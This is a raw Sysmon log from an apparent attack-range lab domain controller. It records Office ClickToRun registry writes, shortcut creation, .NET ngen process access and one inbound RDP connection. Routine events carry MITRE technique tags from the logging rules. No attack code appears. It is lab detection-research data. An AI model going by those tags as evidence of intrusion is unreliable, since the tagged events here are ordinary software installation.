14:57:40.748{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBE4-607E-1B0D-00000000BB01}6240C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075252Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:40.748{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE4-607E-1B0D-00000000BB01}6240C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000075251Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.748{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.Application.16\shell\openAsReadOnly\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075250Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.748{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.Application.16\shell\openAsReadOnly\ddeexec\ifexec\(Default)[] 13241300x800000000000000075249Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.733{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.Application.16\shell\openAsReadOnly\ddeexec\(Default)[SetForeground][ShellOpenDatabase "%%1",0,1] 13241300x800000000000000075248Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:40.733{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.Application.16\shell\openAsReadOnly\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /RO "%%1" %%2 %%3 %%4 %%5 %%6 %%7 %%8 %%9 13241300x800000000000000075247Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.733{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.Application.16\shell\open\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075246Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.733{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.Application.16\shell\open\ddeexec\ifexec\(Default)[] 13241300x800000000000000075245Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.733{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.Application.16\shell\open\ddeexec\(Default)[SetForeground][ShellOpenDatabase "%%1"] 13241300x800000000000000075244Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:40.733{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.Application.16\shell\open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /NOSTARTUP "%%1" %%2 %%3 %%4 %%5 %%6 %%7 %%8 %%9 13241300x800000000000000075243Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.733{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.Application.16\shell\New\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075242Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.733{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.Application.16\shell\New\ddeexec\ifexec\(Default)[] 13241300x800000000000000075241Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.717{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.Application.16\shell\New\ddeexec\(Default)[SetForeground][ShellNewDatabase "%%1"] 13241300x800000000000000075240Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:40.717{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.Application.16\shell\New\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /NOSTARTUP /n "%%1" 13241300x800000000000000075239Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:40.702{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ACCDAExtension.16\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE /NOSTARTUP "%%1" 13241300x800000000000000075238Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.686{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\VisioViewer.Viewer\shell\open\ddeexec\Topic\(Default)WWW_OpenURL 13241300x800000000000000075237Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.686{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\VisioViewer.Viewer\shell\open\ddeexec\(Default)"file:%%1",,-1,,,,, 13241300x800000000000000075236Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:40.686{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\VisioViewer.Viewer\shell\open\command\(Default)"C:\Program Files\Microsoft Office\root\Client\appvlp.exe" "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome 10341000x800000000000000075235Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:40.514{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE4-607E-1A0D-00000000BB01}6392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075234Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:40.499{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBE4-607E-1A0D-00000000BB01}6392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075233Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:40.499{A7A01FEF-EBDA-607E-C60C-00000000BB01}35121112C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE4-607E-1A0D-00000000BB01}6392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 13241300x800000000000000075232Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.452{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\xmlfile\shell\Open\ddeexec\topic\(Default)(Empty) 13241300x800000000000000075231Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.452{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\xmlfile\shell\Open\ddeexec\(Default)(Empty) 13241300x800000000000000075230Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:40.452{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\xmlfile\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "%%1" 13241300x800000000000000075229Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:40.452{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\xmlfile\shell\edit\command\(Default)"C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE" /verb edit "%%1" 10341000x800000000000000075228Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:40.452{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE4-607E-190D-00000000BB01}6428C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075227Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:40.436{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBE4-607E-190D-00000000BB01}6428C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075226Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:40.436{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE4-607E-190D-00000000BB01}6428C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 354300x800000000000000075225Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:38.636{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-39376-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 13241300x800000000000000075224Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.405{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\xmlfile\shell\Open\ddeexec\topic\(Default)(Empty) 13241300x800000000000000075223Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:40.405{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\xmlfile\shell\Open\ddeexec\(Default)(Empty) 13241300x800000000000000075222Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:40.405{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\xmlfile\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "%%1" 13241300x800000000000000075221Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:40.405{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\xmlfile\shell\edit\command\(Default)"C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE" /verb edit "%%1" 11241100x800000000000000075220Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:57:40.389{A7A01FEF-EBE4-607E-180D-00000000BB01}5512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1588-0\Microsoft.Office.Tools.Word.dll2021-04-20 14:57:40.389 11241100x800000000000000075219Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT10232021-04-20 14:57:40.248{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Word.lnk2021-04-20 14:57:40.248 11241100x800000000000000075218Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT10232021-04-20 14:57:40.233{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype for Business.lnk2021-04-20 14:57:40.233 11241100x800000000000000075217Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT10232021-04-20 14:57:40.233{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Publisher.lnk2021-04-20 14:57:40.233 11241100x800000000000000075216Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT10232021-04-20 14:57:40.233{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerPoint.lnk2021-04-20 14:57:40.233 11241100x800000000000000075215Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT10232021-04-20 14:57:40.233{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Outlook.lnk2021-04-20 14:57:40.233 11241100x800000000000000075214Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT10232021-04-20 14:57:40.217{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote.lnk2021-04-20 14:57:40.217 11241100x800000000000000075213Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT10232021-04-20 14:57:40.217{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools\Telemetry Log for Office.lnk2021-04-20 14:57:40.217 11241100x800000000000000075212Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT10232021-04-20 14:57:40.217{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools\Telemetry Dashboard for Office.lnk2021-04-20 14:57:40.217 11241100x800000000000000075211Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT10232021-04-20 14:57:40.202{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools\Spreadsheet Compare.lnk2021-04-20 14:57:40.202 11241100x800000000000000075210Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT10232021-04-20 14:57:40.202{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools\Skype for Business Recording Manager.lnk2021-04-20 14:57:40.202 11241100x800000000000000075209Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT10232021-04-20 14:57:40.202{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools\Office Upload Center.lnk2021-04-20 14:57:40.202 11241100x800000000000000075208Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT10232021-04-20 14:57:40.202{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools\Office Language Preferences.lnk2021-04-20 14:57:40.202 11241100x800000000000000075207Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT10232021-04-20 14:57:40.202{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools\Database Compare.lnk2021-04-20 14:57:40.202 11241100x800000000000000075206Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT10232021-04-20 14:57:40.202{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools2021-04-20 14:57:40.186 11241100x800000000000000075205Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT10232021-04-20 14:57:40.186{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel.lnk2021-04-20 14:57:40.186 11241100x800000000000000075204Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT10232021-04-20 14:57:40.186{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Access.lnk2021-04-20 14:57:40.186 10341000x800000000000000075203Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:40.092{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE4-607E-180D-00000000BB01}5512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075202Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:40.077{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBE4-607E-180D-00000000BB01}5512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075201Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:40.077{A7A01FEF-EBDA-607E-C60C-00000000BB01}35121112C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE4-607E-180D-00000000BB01}5512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000075200Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 